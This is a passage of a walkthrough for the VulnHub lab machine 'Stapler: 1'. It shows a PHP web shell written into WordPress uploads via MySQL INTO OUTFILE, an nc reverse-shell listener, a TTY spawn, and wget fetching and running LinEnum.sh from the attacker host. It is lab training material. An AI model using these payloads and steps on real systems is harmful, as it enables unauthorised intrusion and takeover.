is:<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"0b0b\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">\/var\/www\/https\/blogblog\/wp-content\/uploads\/<\/span><\/pre>\n<p id=\"93d6\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I\u2019ll use MySQL command to create PHP shell.<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"2c4d\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">use mysql<\/span><span id=\"7c03\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">Select \"&lt;?php echo shell_exec($_GET['cmd']);?&gt;\" into outfile \"\/var\/www\/https\/blogblog\/wp-content\/uploads\/shell.php\";<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev akb\">\n<div class=\"kc s ao kd\">\n<div class=\"akc kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*H2ebE-Ie4DUbwzzBTSlW8A.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1485\" height=\"247\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe96\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe96\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2228\/1*H2ebE-Ie4DUbwzzBTSlW8A.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*H2ebE-Ie4DUbwzzBTSlW8A.png 276w, https:\/\/miro.medium.com\/max\/828\/1*H2ebE-Ie4DUbwzzBTSlW8A.png 552w, https:\/\/miro.medium.com\/max\/960\/1*H2ebE-Ie4DUbwzzBTSlW8A.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*H2ebE-Ie4DUbwzzBTSlW8A.png 700w\" width=\"1485\" height=\"247\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe97\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe97\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"7f5e\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Verify if the file exists.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev akd\">\n<div class=\"kc s ao kd\">\n<div class=\"ake kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*waK5nP1Y_BIRkLJ2YG3MJA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"849\" height=\"264\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe98\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe98\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"849\" height=\"264\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"0c3e\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Intercept the request w\/ Burp Suite and send it to the repeater<\/p>\n<p id=\"bb37\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Add \u2018?cmd=id\u2019 to test the shell function.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev akf\">\n<div class=\"kc s ao kd\">\n<div class=\"akg kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*QVImJ6hZjgWY42c91DXf5w.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1184\" height=\"304\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe99\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe99\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"1184\" height=\"304\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"cf48\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Prepare listener on port 443<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"c7d2\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">rlwrap nc -lvp 443<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ago\">\n<div class=\"kc s ao kd\">\n<div class=\"akh kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*ijtsKMYZL41vfzk_QzXt1w.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"749\" height=\"75\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe100\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe100\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1124\/1*ijtsKMYZL41vfzk_QzXt1w.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*ijtsKMYZL41vfzk_QzXt1w.png 276w, https:\/\/miro.medium.com\/max\/828\/1*ijtsKMYZL41vfzk_QzXt1w.png 552w, https:\/\/miro.medium.com\/max\/960\/1*ijtsKMYZL41vfzk_QzXt1w.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*ijtsKMYZL41vfzk_QzXt1w.png 700w\" width=\"749\" height=\"75\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe101\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe101\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"0c42\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I\u2019ll supply a reverse shell command to the generated shell using this cheatsheet:<\/p>\n<div class=\"hc hd he hf hg hh\">\n<div class=\"hi n ab\">\n<div class=\"hj n ak p hk hl\">\n<h2 class=\"ba cz dn bc hm hn ho hp hq hr hs dk gj\">Reverse Shell Cheat Sheet<\/h2>\n<div class=\"ht s\">\n<h3 class=\"ba b dn bc hm hn ho hp hq hr hs by\">If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards\u2026<\/h3>\n<\/div>\n<div class=\"hu s\">\n<p class=\"ba b hv bc hm hn ho hp hq hr hs by\">pentestmonkey.net<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p id=\"1711\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Encode to URL w\/ Burp Suite\u2019s decoder.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aki\">\n<div class=\"kc s ao kd\">\n<div class=\"akj kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*AWaJWwLLBLTsN8fmNtlTgQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"948\" height=\"221\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe102\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe102\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1422\/1*AWaJWwLLBLTsN8fmNtlTgQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*AWaJWwLLBLTsN8fmNtlTgQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*AWaJWwLLBLTsN8fmNtlTgQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*AWaJWwLLBLTsN8fmNtlTgQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*AWaJWwLLBLTsN8fmNtlTgQ.png 700w\" width=\"948\" height=\"221\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe103\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe103\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"0221\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Supply encoded reverse shell command w\/ repeater.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev akk\">\n<div class=\"kc s ao kd\">\n<div class=\"akl kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*Q-SPz7YkVkNXdMOwp9aAlg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1112\" height=\"289\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe104\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe104\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1668\/1*Q-SPz7YkVkNXdMOwp9aAlg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*Q-SPz7YkVkNXdMOwp9aAlg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*Q-SPz7YkVkNXdMOwp9aAlg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*Q-SPz7YkVkNXdMOwp9aAlg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*Q-SPz7YkVkNXdMOwp9aAlg.png 700w\" width=\"1112\" height=\"289\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe105\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe105\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"3347\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">After many tries, I succeeded w\/ this command.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev akm\">\n<div class=\"kc s ao kd\">\n<div class=\"akn kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*EMHJT3U4CWAFL3NIwPWjwQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"901\" height=\"337\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe106\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe106\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1352\/1*EMHJT3U4CWAFL3NIwPWjwQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*EMHJT3U4CWAFL3NIwPWjwQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*EMHJT3U4CWAFL3NIwPWjwQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*EMHJT3U4CWAFL3NIwPWjwQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*EMHJT3U4CWAFL3NIwPWjwQ.png 700w\" width=\"901\" height=\"337\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe107\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe107\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"f6c0\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Back to the listener, now I got the shell.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ako\">\n<div class=\"kc s ao kd\">\n<div class=\"akp kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*8ZkoZ5zFn4YGr_86OKSxrg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"751\" height=\"126\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe108\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe108\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1127\/1*8ZkoZ5zFn4YGr_86OKSxrg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*8ZkoZ5zFn4YGr_86OKSxrg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*8ZkoZ5zFn4YGr_86OKSxrg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*8ZkoZ5zFn4YGr_86OKSxrg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*8ZkoZ5zFn4YGr_86OKSxrg.png 700w\" width=\"751\" height=\"126\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe109\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe109\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<\/div>\n<\/div>\n<\/section>\n<div class=\"n p cw kw kx ky\" role=\"separator\"><\/div>\n<section class=\"dm fi fj dh fk\">\n<div class=\"n p\">\n<div class=\"ap aq ar as at fl av w\">\n<p id=\"f9bf\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\"><strong class=\"if cz\">Privilege Escalation<\/strong><\/p>\n<p id=\"11b6\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I\u2019ll continue w\/ WordPress shell.<\/p>\n<p id=\"2362\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Get TTY shell<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"a273\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">python -c \u2018import pty;pty.spawn(\u201c\/bin\/bash\u201d);\u2019<\/span><\/pre>\n<ol class=\"\">\n<li id=\"8702\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja jb jc jd gj\" data-selectable-paragraph=\"\">Explore directory as listed<\/li>\n<\/ol>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"4881\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">\/opt<\/span><span id=\"07cb\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">\/tmp<\/span><span id=\"ee96\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">\/var\/log<\/span><span id=\"5c93\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">\/var\/www\/https\/<\/span><span id=\"f7fc\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">\/var\/mail<\/span><\/pre>\n<p id=\"349e\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I came across this \/var\/mail\/www-data. There\u2019s a PHP-mailer, but I don't know how to exploit it. Let\u2019s skip this for a moment.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev akq\">\n<div class=\"kc s ao kd\">\n<div class=\"akr kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*swvidUoFhNdFznkzxWRfgg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"791\" height=\"601\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe110\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe110\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1187\/1*swvidUoFhNdFznkzxWRfgg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*swvidUoFhNdFznkzxWRfgg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*swvidUoFhNdFznkzxWRfgg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*swvidUoFhNdFznkzxWRfgg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*swvidUoFhNdFznkzxWRfgg.png 700w\" width=\"791\" height=\"601\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe111\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe111\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"6873\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">2. LinEnum.sh<\/p>\n<p id=\"b0db\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Prepare attacker machine to be file server<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"1c52\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">python -m SimpleHTTPServer 80<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aks\">\n<div class=\"kc s ao kd\">\n<div class=\"akt kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*YkZZrN6KduXngKL4MPwCvA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"719\" height=\"110\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe112\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe112\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1079\/1*YkZZrN6KduXngKL4MPwCvA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*YkZZrN6KduXngKL4MPwCvA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*YkZZrN6KduXngKL4MPwCvA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*YkZZrN6KduXngKL4MPwCvA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*YkZZrN6KduXngKL4MPwCvA.png 700w\" width=\"719\" height=\"110\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe113\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe113\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"797f\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Download, store in \/tmp, change permission, and run<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"35de\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cd \/tmp<\/span><span id=\"5afa\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">wget <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.0.2.32\/LinEnum.sh\" rel=\"noopener nofollow\" rel=\"nofollow\" >http:\/\/10.0.2.32\/LinEnum.sh<\/a><\/span><span id=\"8e60\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">chmod 777 LinEnum.sh<\/span><span id=\"4429\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">.\/LinEnum.sh<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aku\">\n<div class=\"kc s ao kd\">\n<div class=\"akv kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*bQL9JAyQgcPEPKQWTc0ggA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"890\" height=\"420\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe114\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe114\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1335\/1*bQL9JAyQgcPEPKQWTc0ggA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*bQL9JAyQgcPEPKQWTc0ggA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*bQL9JAyQgcPEPKQWTc0ggA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*bQL9JAyQgcPEPKQWTc0ggA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*bQL9JAyQgcPEPKQWTc0ggA.png 700w\" width=\"890\" height=\"420\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe115\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe115\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"4f38\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">These are information that I\u2019ve found interesting.<\/p>\n<p id=\"1566\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Kernel version 4.4.0<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev akw\">\n<div class=\"kc s ao kd\">\n<div class=\"akx kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*E8HEed6iMem5S2f6mYNBzA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1166\" height=\"106\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe116\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe116\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1749\/1*E8HEed6iMem5S2f6mYNBzA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*E8HEed6iMem5S2f6mYNBzA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*E8HEed6iMem5S2f6mYNBzA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*E8HEed6iMem5S2f6mYNBzA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*E8HEed6iMem5S2f6mYNBzA.png 700w\" width=\"1166\" height=\"106\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe117\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe117\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"5fee\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">User that can run sudo, peter<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev aky\">\n<div class=\"kc s ao kd\">\n<div class=\"akz kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*DmkyOtaaJDVAmaZ1YwnL0w.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"492\" height=\"98\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe118\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe118\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/738\/1*DmkyOtaaJDVAmaZ1YwnL0w.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 492px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*DmkyOtaaJDVAmaZ1YwnL0w.png 276w, https:\/\/miro.medium.com\/max\/738\/1*DmkyOtaaJDVAmaZ1YwnL0w.png 492w\" width=\"492\" height=\"98\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe119\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe119\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"2c36\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Cronjob located in \u2018\/etc\/cron.d\u2019<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ala\">\n<div class=\"kc s ao kd\">\n<div class=\"alb kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" 